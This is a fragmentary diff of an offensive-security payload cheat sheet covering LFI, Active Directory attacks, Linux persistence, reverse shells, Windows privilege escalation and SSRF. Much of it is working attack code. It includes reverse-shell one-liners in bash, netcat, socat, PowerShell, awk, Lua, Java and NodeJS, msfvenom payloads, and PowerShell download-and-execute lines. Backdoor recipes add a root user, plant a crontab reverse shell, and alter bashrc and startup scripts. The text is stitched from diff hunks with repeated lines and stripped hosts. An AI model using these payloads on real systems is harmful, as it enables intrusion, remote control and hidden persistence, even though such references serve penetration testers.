## Basic LFI
* [Kadimus -](
* [LFISuite -](
* [fimap -](
## Basic LFI
### Null byte
### Null byte
:warning: In versions of PHP below 5.3 we can terminate with null byte.

## References
* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](
* [GraphQL cheatsheet - DEVHINTS.IO](
* [GraphQL cheatsheet - DEVHINTS.IO](
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](

@ -318,6 +318,11 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
or dump the Active Directory and `grep` the content.
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd -o ~/Documents/AD_DUMP/
### PassTheTicket Golden Tickets
@ -581,6 +586,8 @@ Alternatively you can use the Metasploit module
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
## References
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](

# Linux - Persistence
# Linux - Persistence
## Summary
* [Basic reverse shell](#basic-reverse-shell)
* [Add a root user](#add-a-root-user)
* [Suid Binary](#suid-binary)
* [Crontab - Reverse shell](#crontab-reverse-shell)
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
* [Backdooring a startup service](#backdoor-a-startup-service)
* [Backdooring a user startup file](#backdooring-an-user-startup-file)
* [Backdooring a driver](#backdooring-a-driver)
* [Backdooring the APT](#backdooring-the-apt)
* [Backdooring the SSH](#backdooring-the-ssh)
* [Tips](#tips)
* [References](#references)
## Basic reverse shell
@ -8,6 +24,13 @@ ncat --sctp -lvp 4242
ncat --tcp -lvp 4242
## Add a root user
sudo useradd -ou 0 -g 0 john
sudo passwd john
## Suid Binary
@ -19,13 +42,15 @@ chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant
## Crontab (Reverse shell to on port 4242)
## Crontab - Reverse shell
(crontab -l ; echo "@reboot sleep 200 && ncat 4242 -e /bin/bash")|crontab 2> /dev/null
## Backdooring an user's bash_rc (FR/EN Version)
## Backdooring a user's bash_rc
(FR/EN Version)
@ -48,7 +73,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
## Backdooring a user startup file
## Backdooring a user startup file
View file

@ -5,6 +5,7 @@
* [Reverse Shell](#reverse-shell)
* [Bash TCP](#bash-tcp)
* [Bash UDP](#bash-udp)
* [Socat](#socat)
* [Perl](#perl)
* [Python](#python)
* [PHP](#php)
@ -50,6 +51,15 @@ Listener:
nc -u -lvp 4242
### Socat
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:
Static socat binary can be found at [](
### Perl
@ -118,12 +128,13 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","
nc -e /bin/sh [IPADDR] [PORT]
nc.traditional -e /bin/bash 4444
### Netcat OpenBsd
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f
### Ncat
@ -147,11 +158,11 @@ user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet
### Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
@ -161,21 +172,21 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
### Awk
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
awk 'BEGIN {s = "/inet/tcp/0/>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
### Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
### War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
@ -185,13 +196,13 @@ strings reverse.war | grep jsp # in order to get the name of the file
Linux only
lua -e "require('socket');require('os');t=socket.tcp();t:connect('','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua -e "require('socket');require('os');t=socket.tcp();t:connect('','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Windows and Linux
lua5.1 -e 'local host, port = "", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
lua5.1 -e 'local host, port = "", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
### NodeJS
@ -202,7 +213,7 @@ lua5.1 -e 'local host, port = "", 4444 local socket = require("socket")
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "", function(){
client.connect(4242, "", function(){
@ -213,12 +224,12 @@ lua5.1 -e 'local host, port = "", 4444 local socket = require("socket")
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec('nc -e /bin/sh 4242')
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
View file

@ -23,6 +23,10 @@
## Tools
- [PowerSploit's PowerUp](
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](
@ -43,10 +47,6 @@
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
- [PowerSploit's PowerUp](
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks
View file

@ -114,6 +114,7 @@ http://0000::1:3128/ Squid
### Bypass localhost with a domain redirection
```powershell redirect to == localhost
## References
- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](
- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](
- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](
- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](
- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](
- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](